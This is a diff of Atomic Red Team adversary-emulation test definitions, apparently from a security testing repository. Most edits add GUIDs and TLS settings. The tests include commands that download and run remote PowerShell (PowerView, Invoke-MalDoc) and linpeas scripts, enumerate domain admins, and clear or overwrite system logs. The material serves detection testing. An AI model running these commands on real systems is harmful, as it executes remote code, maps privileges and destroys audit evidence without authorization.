+**auto_generated_guid:** 0d181431-ddf3-4826-8055-2dbf63ae848b
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | encoded_command_param_variation | The "EncodedCommand" parameter variation to use | String | E|
 | command_line_switch_type | The type of supported command-line switch to use | String | Hyphen|
@@ -686,7 +758,7 @@ Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_swit
 ```powershell
 $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
 if (-not $RequiredModule) {exit 1}
-if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0} 
+if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0}
 ```
 ##### Get Prereq Commands:
 ```powershell

atomics/T1059.002/T1059.002.md

@@ -24,6 +24,10 @@ Reference: https://github.com/EmpireProject/Empire
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** 3600d97d-81b9-4171-ab96-e4386506e2c2
+
+
+
 
 
 

atomics/T1059.003/T1059.003.md

@@ -21,10 +21,14 @@ Creates and executes a simple batch script. Upon execution, CMD will briefly lau
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 9e8894c0-50bd-4525-a96c-d4ac78ece388
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | command_to_execute | Command to execute within script. | string | dir|
 | script_path | Script path. | path | $env:TEMP\T1059.003_script.bat|
@@ -48,7 +52,7 @@ Remove-Item #{script_path} -Force -ErrorAction Ignore
 ##### Description: Batch file must exist on disk at specified location (#{script_path})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{script_path}) {exit 0} else {exit 1} 
+if (Test-Path #{script_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -68,10 +72,14 @@ Writes text to a file and display the results. This test is intended to emulate
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 127b4afe-2346-4192-815c-69042bec570e
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | file_contents_path | Path to the file that the command prompt will drop. | path | %TEMP%\test.bin|
 | message | Message that will be written to disk and then displayed. | string | Hello from the Windows Command Prompt!|

atomics/T1059.004/T1059.004.md

@@ -21,10 +21,14 @@ Creates and executes a simple bash script.
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | script_path | Script path | path | /tmp/art.sh|
 
@@ -59,6 +63,10 @@ Upon successful execution, sh will download via curl and wget the specified payl
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** d0c88567-803d-4dca-99b4-7ce65e7b257c
+
+
+
 
 
 

atomics/T1059.005/T1059.005.md

@@ -25,10 +25,14 @@ When successful, system information will be written to $env:TEMP\T1059.005.out.t
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 1620de42-160a-4fe5-bbaf-d3fef0181ce9
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | vbscript | Path to sample script | String | PathToAtomicsFolder\T1059.005\src\sys_info.vbs|
 
@@ -52,7 +56,7 @@ Remove-Item $env:TEMP\T1059.005.out.txt -ErrorAction Ignore
 ##### Description: Sample script must exist on disk at specified location (#{vbscript})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{vbscript}) {exit 0} else {exit 1} 
+if (Test-Path #{vbscript}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -77,6 +81,10 @@ You can validate this by opening WinWord -> File -> Account -> About Word
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** e8209d5f-e42d-45e6-9c2f-633ac4f1eefa
+
+
+
 
 
 
@@ -84,7 +92,8 @@ You can validate this by opening WinWord -> File -> Account -> About Word
 
 
 ```powershell
-IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
 Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec"
 ```
 
@@ -104,7 +113,7 @@ try {
   $path = $wdApp.Path
   Stop-Process -Name "winword"
   if ($path.contains("(x86)")) { exit 1 } else { exit 0 }
-} catch { exit 1 } 
+} catch { exit 1 }
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -125,10 +134,14 @@ memory location to a file stored in the $env:TEMP\atomic_t1059_005_test_output.b
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 8faff437-a114-4547-9a60-749652a03df6
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | ms_product | Maldoc application Word | String | Word|
 
@@ -137,7 +150,8 @@ memory location to a file stored in the $env:TEMP\atomic_t1059_005_test_output.b
 
 
 ```powershell
-IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) 
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) 
 Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059_005-macrocode.txt" -officeProduct "Word" -sub "Extract"
 ```
 
@@ -157,7 +171,7 @@ try {
   $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
   Stop-Process -Name $process
   exit 0
-} catch { exit 1 } 
+} catch { exit 1 }
 ```
 ##### Get Prereq Commands:
 ```powershell

atomics/T1059.005/T1059.005.yaml

@@ -54,7 +54,8 @@ atomic_tests:
       Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement"
   executor:
     command: |
-      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
       Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec"
     cleanup_command: |
       Get-WmiObject win32_process | Where-Object {$_.CommandLine -like "*mshta*"}  | % { "$(Stop-Process $_.ProcessID)" } | Out-Null
@@ -88,8 +89,9 @@ atomic_tests:
       Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
   executor:
     command: |
-      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) 
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) 
       Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059_005-macrocode.txt" -officeProduct "Word" -sub "Extract"
     cleanup_command: |
       Remove-Item "$env:TEMP\atomic_t1059_005_test_output.bin" -ErrorAction Ignore
-    name: powershell
+    name: powershell

atomics/T1059.006/T1059.006.md

@@ -21,10 +21,14 @@ Download and execute shell script and write to file then execute locally using P
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 3a95cdb2-c6ea-4761-b24e-02b71889b8bb
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | script_url | Shell script public URL | String | https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh|
 | payload_file_name | Name of shell script downloaded from the script_url | String | T1059.006-payload|
@@ -51,7 +55,7 @@ rm #{payload_file_name}
 ##### Check Prereq Commands:
 ```sh
 which_python=`which python`; python -V
-$which_python -c 'import requests' 2>/dev/null; echo $? 
+$which_python -c 'import requests' 2>/dev/null; echo $?
 ```
 ##### Get Prereq Commands:
 ```sh
@@ -70,10 +74,14 @@ Create Python file (.py) that downloads and executes shell script via executor a
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | python_script_name | Python script name | Path | T1059.006.py|
 | script_url | Shell script public URL | String | https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh|
@@ -111,7 +119,7 @@ rm #{python_script_name} #{payload_file_name}
 ##### Check Prereq Commands:
 ```sh
 which_python=`which python`; python -V
-$which_python -c 'import requests' 2>/dev/null; echo $? 
+$which_python -c 'import requests' 2>/dev/null; echo $?
 ```
 ##### Get Prereq Commands:
 ```sh
@@ -130,10 +138,14 @@ Create Python file (.py) then compile to binary (.pyc) that downloads an externa
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 0b44d79b-570a-4b27-a31f-3bf2156e5eaa
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | python_script_name | Name of Python script name | Path | T1059.006.py|
 | script_url | URL hosting external malicious payload | String | https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh|
@@ -173,7 +185,7 @@ rm #{python_binary_name} #{python_script_name} #{payload_file_name}
 ##### Check Prereq Commands:
 ```sh
 which_python=`which python`; python -V
-$which_python -c 'import requests' 2>/dev/null; echo $? 
+$which_python -c 'import requests' 2>/dev/null; echo $?
 ```
 ##### Get Prereq Commands:
 ```sh

atomics/T1069.001/T1069.001.md

@@ -21,6 +21,10 @@ Permission Groups Discovery
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** 952931a4-af0b-4335-bbbe-73c8c5b327ae
+
+
+
 
 
 
@@ -48,6 +52,10 @@ information will be displayed.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 1f454dd6-e134-44df-bebb-67de70fb6cd8
+
+
+
 
 
 
@@ -74,6 +82,10 @@ information will be displayed.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** a580462d-2c19-4bc7-8b9a-57a41b7d3ba4
+
+
+
 
 
 

atomics/T1069.002/T1069.002.md

@@ -32,6 +32,10 @@ information will be displayed.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** dd66d77d-8998-48c0-8024-df263dc2ce5d
+
+
+
 
 
 
@@ -60,10 +64,14 @@ information will be displayed.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | user | User to identify what groups a user is a member of | string | administrator|
 
@@ -90,6 +98,10 @@ test will display some errors if run on a computer not connected to a domain. Up
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 0afb5163-8181-432e-9405-4322710c0c37
+
+
+
 
 
 
@@ -117,6 +129,10 @@ Find machines where user has local admin access (PowerView). Upon execution, pro
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** a2d71eee-a353-4232-9f86-54f4288dd8c1
+
+
+
 
 
 
@@ -124,6 +140,7 @@ Find machines where user has local admin access (PowerView). Upon execution, pro
 
 
 ```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-LocalAdminAccess -Verbose
 ```
 
@@ -141,6 +158,10 @@ Enumerates members of the local Administrators groups across all machines in the
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd
+
+
+
 
 
 
@@ -148,6 +169,7 @@ Enumerates members of the local Administrators groups across all machines in the
 
 
 ```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-EnumerateLocalAdmin  -Verbose
 ```
 
@@ -165,10 +187,14 @@ takes a computer and determines who has admin rights over it through GPO enumera
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 64fdb43b-5259-467a-b000-1b02c00e510a
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | computer_name | hostname of the computer to analyze | Path | $env:COMPUTERNAME|
 
@@ -177,7 +203,8 @@ takes a computer and determines who has admin rights over it through GPO enumera
 
 
 ```powershell
-IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose"
 ```
 
 
@@ -194,6 +221,10 @@ When successful, accounts that do not require kerberos pre-auth will be returned
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 870ba71e-6858-4f6d-895c-bb6237f6121b
+
+
+
 
 
 
@@ -211,7 +242,7 @@ get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq
 ##### Description: Computer must be domain joined.
 ##### Check Prereq Commands:
 ```powershell
-if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} 
+if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -220,7 +251,7 @@ Write-Host Joining this computer to a domain must be done manually.
 ##### Description: Requires the Active Directory module for powershell to be installed.
 ##### Check Prereq Commands:
 ```powershell
-if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1} 
+if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -240,10 +271,14 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 48ddc687-82af-40b7-8472-ff1e742e8274
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder\T1087.002\src\AdFind.exe|
 
@@ -262,10 +297,11 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
 ##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{adfind_path}) {exit 0} else {exit 1} 
+if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
 ```
 

atomics/T1069.002/T1069.002.yaml

@@ -53,6 +53,7 @@ atomic_tests:
   - windows
   executor:
     command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
       IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-LocalAdminAccess -Verbose
     name: powershell
 - name: Find local admins on all machines in domain (PowerView)
@@ -63,6 +64,7 @@ atomic_tests:
   - windows
   executor:
     command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
       IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-EnumerateLocalAdmin  -Verbose
     name: powershell
 - name: Find Local Admins via Group Policy (PowerView)
@@ -77,7 +79,9 @@ atomic_tests:
       type: Path
       default: $env:COMPUTERNAME
   executor:
-    command: "IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose"
+    command: | 
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose"
     name: powershell
 - name: Enumerate Users Not Requiring Pre Auth (ASRepRoast)
   auto_generated_guid: 870ba71e-6858-4f6d-895c-bb6237f6121b
@@ -123,6 +127,7 @@ atomic_tests:
     prereq_command: |
       if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
     get_prereq_command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
       Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
   executor:
     command: |

atomics/T1070.001/T1070.001.md

@@ -27,10 +27,14 @@ Upon execution this test will clear Windows Event Logs. Open the System.evtx log
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** e6abb60e-26b8-41da-8aae-0c35174b0967
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | log_name | Windows Log Name, ex System | String | System|
 
@@ -58,6 +62,10 @@ Upon execution, open the Security.evtx logs at C:\Windows\System32\winevt\Logs a
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** b13e9306-3351-4b4b-a6e8-477358b0b498
+
+
+
 
 
 
@@ -86,6 +94,10 @@ Elevation is required for this module to execute properly, otherwise WINWORD wil
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 1b682d84-f075-4f93-9a89-8a8de19ffd6e
+
+
+
 
 
 
@@ -93,7 +105,8 @@ Elevation is required for this module to execute properly, otherwise WINWORD wil
 
 
 ```powershell
-IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
 Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1070.001\src\T1070.001-macrocode.txt" -officeProduct "Word" -sub "ClearLogs"
 ```
 
@@ -108,7 +121,7 @@ try {
   New-Object -COMObject "Word.Application" | Out-Null
   Stop-Process -Name "winword"
   exit 0
-} catch { exit 1 } 
+} catch { exit 1 }
 ```
 ##### Get Prereq Commands:
 ```powershell

atomics/T1070.001/T1070.001.yaml

@@ -54,7 +54,8 @@ atomic_tests:
       Write-Host "You will need to install Microsoft Word manually to meet this requirement"
   executor:
     command: |
-      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
       Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1070.001\src\T1070.001-macrocode.txt" -officeProduct "Word" -sub "ClearLogs"
     name: powershell
-    elevation_required: true
+    elevation_required: true

atomics/T1070.002/T1070.002.md

@@ -28,6 +28,10 @@ Delete system and audit logs
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** 989cc1b1-3642-4260-a809-54f9dd559683
+
+
+
 
 
 
@@ -53,10 +57,14 @@ This test overwrites the Linux mail spool of a specified user. This technique wa
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 1602ff76-ed7f-4c94-b550-2f727b4782d4
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | username | Username of mail spool | String | root|
 
@@ -82,10 +90,14 @@ This test overwrites the specified log. This technique was used by threat actor
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** d304b2dc-90b4-4465-a650-16ddd503f7b5
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | log_path | Path of specified log | Path | /var/log/secure|